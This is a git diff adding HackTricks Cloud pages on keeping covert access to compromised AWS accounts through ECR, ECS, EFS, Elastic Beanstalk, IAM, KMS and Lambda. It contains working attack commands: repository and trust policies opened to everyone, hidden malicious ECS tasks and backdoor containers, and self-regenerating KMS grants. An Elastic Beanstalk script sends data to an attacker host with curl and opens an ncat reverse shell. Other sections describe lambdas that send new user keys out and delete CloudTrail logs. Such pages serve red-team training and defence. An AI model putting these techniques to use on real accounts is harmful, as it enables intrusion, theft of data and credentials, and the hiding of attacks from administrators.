+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md new file mode 100644 index 0000000000..cdea71f8d7 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md @@ -0,0 +1,124 @@ +# AWS - ECR Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECR + +For more information check: + +{% content-ref url="../aws-services/aws-ecr-enum.md" %} +[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) +{% endcontent-ref %} + +### Hidden Docker Image with Malicious Code + +An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. + +### Repository Policy + +Add a policy to a single repository granting yourself (or everybody) access to a repository: + +```bash +aws ecr set-repository-policy \ + --repository-name cluster-autoscaler \ + --policy-text file:///tmp/my-policy.json + +# With a .json such as + +{ + "Version" : "2008-10-17", + "Statement" : [ + { + "Sid" : "allow public pull", + "Effect" : "Allow", + "Principal" : "*", + "Action" : [ + "ecr:BatchCheckLayerAvailability", + "ecr:BatchGetImage", + "ecr:GetDownloadUrlForLayer" + ] + } + ] +} +``` + +{% hint style="warning" %} +Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. +{% endhint %} + +### Registry Policy & Cross-account Replication + +It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. + +
+ +First, you need to give the external account access over the registry with a **registry policy** like: + +```bash +aws ecr put-registry-policy --policy-text file://my-policy.json + +# With a .json like: + +{ + "Sid": "asdasd", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::947247140022:root" + }, + "Action": [ + "ecr:CreateRepository", + "ecr:ReplicateImage" + ], + "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" +} +``` + +Then apply the replication config: + +```bash +aws ecr put-replication-configuration \ + --replication-configuration file://replication-settings.json \ + --region us-west-2 + +# Having the .json a content such as: +{ + "rules": [{ + "destinations": [{ + "region": "destination_region", + "registryId": "destination_accountId" + }], + "repositoryFilters": [{ + "filter": "repository_prefix_name", + "filterType": "PREFIX_MATCH" + }] + }] +} +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md new file mode 100644 index 0000000000..0b79be73e2 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md @@ -0,0 +1,128 @@ +# AWS - ECS Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECS + +For more information check: + +{% content-ref url="../aws-services/aws-ecs-enum.md" %} +[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) +{% endcontent-ref %} + +### Hidden Periodic ECS Task + +{% hint style="info" %} +TODO: Test +{% endhint %} + +An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account. + +```bash +# Create a malicious task definition +aws ecs register-task-definition --family "malicious-task" --container-definitions '[ + { + "name": "malicious-container", + "image": "malicious-image:latest", + "memory": 256, + "cpu": 10, + "essential": true + } +]' + +# Create an Amazon EventBridge rule to trigger the task periodically +aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)" + +# Add a target to the rule to run the malicious ECS task +aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ + { + "Id": "malicious-ecs-task-target", + "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", + "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", + "EcsParameters": { + "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", + "TaskCount": 1 + } + } +]' +``` + +### Backdoor Container in Existing ECS Task Definition + +{% hint style="info" %} +TODO: Test +{% endhint %} + +An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities. 
+ +```bash +# Update the existing task definition to include the backdoor container +aws ecs register-task-definition --family "existing-task" --container-definitions '[ + { + "name": "legitimate-container", + "image": "legitimate-image:latest", + "memory": 256, + "cpu": 10, + "essential": true + }, + { + "name": "backdoor-container", + "image": "malicious-image:latest", + "memory": 256, + "cpu": 10, + "essential": false + } +]' +``` + +### Undocumented ECS Service + +{% hint style="info" %} +TODO: Test +{% endhint %} + +An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service. + +```bash +# Create a malicious task definition +aws ecs register-task-definition --family "malicious-task" --container-definitions '[ + { + "name": "malicious-container", + "image": "malicious-image:latest", + "memory": 256, + "cpu": 10, + "essential": true + } +]' + +# Create an undocumented ECS service with the malicious task definition +aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md new file mode 100644 index 0000000000..b534c2fd27 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md @@ -0,0 +1,47 @@ +# AWS - EFS Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EFS + +For more information check: + +{% content-ref url="../aws-services/aws-efs-enum.md" %} +[aws-efs-enum.md](../aws-services/aws-efs-enum.md) +{% endcontent-ref %} + +### Modify Resource Policy / Security Groups + +Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. + +### Create Access Point + +You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md new file mode 100644 index 0000000000..068ef11c55 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md @@ -0,0 +1,104 @@ +# AWS - Elastic Beanstalk Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Elastic Beanstalk + +For more information check: + +{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} +[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) +{% endcontent-ref %} + +### Persistence in Instance + +In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**. + +### Backdoor in Version + +An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code. + +### New backdoored version + +Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application. + +### Abusing Custom Resource Lifecycle Hooks + +{% hint style="info" %} +TODO: Test +{% endhint %} + +Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**. 
+ +```bash +bashCopy code# Attacker creates a script that exfiltrates data and maintains access +echo '#!/bin/bash +aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv +gzip /tmp/data.csv +curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil +ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh + +# Attacker uploads the script to an S3 bucket +aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh + +# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook +echo 'Resources: + AWSEBAutoScalingGroup: + Metadata: + AWS::ElasticBeanstalk::Ext: + TriggerConfiguration: + triggers: + - name: stealthy-lifecycle-hook + events: + - "autoscaling:EC2_INSTANCE_LAUNCH" + - "autoscaling:EC2_INSTANCE_TERMINATE" + target: + ref: "AWS::ElasticBeanstalk::Environment" + arn: + Fn::GetAtt: + - "AWS::ElasticBeanstalk::Environment" + - "Arn" + stealthyLifecycleHook: + Type: AWS::AutoScaling::LifecycleHook + Properties: + AutoScalingGroupName: + Ref: AWSEBAutoScalingGroup + LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING + NotificationTargetARN: + Ref: stealthy-lifecycle-hook + RoleARN: + Fn::GetAtt: + - AWSEBAutoScalingGroup + - Arn' > stealthy_lifecycle_hook.yaml + +# Attacker applies the new environment configuration +aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml" +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md new file mode 100644 index 0000000000..accebf3999 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md @@ -0,0 +1,78 @@ +# AWS - IAM Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## IAM + +For more information access: + +{% content-ref url="../aws-services/aws-iam-enum.md" %} +[aws-iam-enum.md](../aws-services/aws-iam-enum.md) +{% endcontent-ref %} + +### Common IAM Persistence + +* Create a user +* Add a controlled user to a privileged group +* Create access keys (of the new user or of all users) +* Grant extra permissions to controlled users/groups (attached policies or inline policies) +* Disable MFA / Add you own MFA device +* Create a Role Chain Juggling situation (more on this below in STS persistence) + +### Backdoor Role Trust Policies + +You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": [ + "*", + "arn:aws:iam::123213123123:root" + ] + }, + "Action": "sts:AssumeRole" + } + ] +} +``` + +### Backdoor Policy Version + +Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. + +### Backdoor / Create Identity Provider + +If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md new file mode 100644 index 0000000000..dbf4efa296 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md @@ -0,0 +1,66 @@ +# AWS - KMS Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## KMS + +For mor information check: + +{% content-ref url="../aws-services/aws-kms-enum.md" %} +[aws-kms-enum.md](../aws-services/aws-kms-enum.md) +{% endcontent-ref %} + +### Grant acces via KMS policies + +An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. + +### Eternal Grant + +Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. + +Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. + +(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) + +```bash +# To generate grants, generate 10 like this one +aws kms create-grant \ + --key-id \ + --grantee-principal \ + --operations "CreateGrant" "Decrypt" + +# To monitor grants +aws kms list-grants --key-id +``` + +{% hint style="info" %} +A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) +{% endhint %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md new file mode 100644 index 0000000000..13f2777a8e --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md @@ -0,0 +1,90 @@ +# AWS - Lambda Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lambda + +For more information check: + +{% content-ref url="../../aws-services/aws-lambda-enum.md" %} +[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) +{% endcontent-ref %} + +### Lambda Layer Persistence + +It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: + +{% content-ref url="aws-lambda-layers-persistence.md" %} +[aws-lambda-layers-persistence.md](aws-lambda-layers-persistence.md) +{% endcontent-ref %} + +### Lambda Extension Persistence + +Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. + +{% content-ref url="aws-abusing-lambda-extensions.md" %} +[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md) +{% endcontent-ref %} + +### Via resource policies + +It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: + +
+ +### Versions, Aliases & Weights + +A Lambda can have **different versions** (with different code each version).\ +Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ +This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. + +
+ +### Version Backdoor + API Gateway + +1. Copy the original code of the Lambda +2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST + 1. Call the API gateway related to the lambda to execute the code +3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. + 1. This will hide the backdoored code in a previous version +4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` + 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). +5. Select the POST method created and in Actions select **`Deploy API`** +6. Now, when you **call the function via POST your Backdoor** will be invoked + +### Cron/Event actuator + +The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ +Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. + +* Every time a new user is created lambda generates a new user key and send it to the attacker. +* Every time a new role is created lambda gives assume role permissions to compromised users. +* Every time new cloudtrail logs are generated, delete/alter them + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md new file mode 100644 index 0000000000..aa8a0269f0 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md @@ -0,0 +1,69 @@ +# AWS - Abusing Lambda Extensions + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lambda Extensions + +Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. + +* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. +* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. + +For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). + +### External Extension for Persistence, Stealing Requests & modifying Requests + +This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) + +It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process\_vm\_readv**” and “**process\_vm\_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. 
**This means that an external extension has full read and write access to Rapid’s heap memory, by design.** + +Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. + +The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. + +

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

+ +The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. + +{% hint style="warning" %} +By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. +{% endhint %} + +Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. + +

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

+ +The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. + +## References + +* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) +* [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
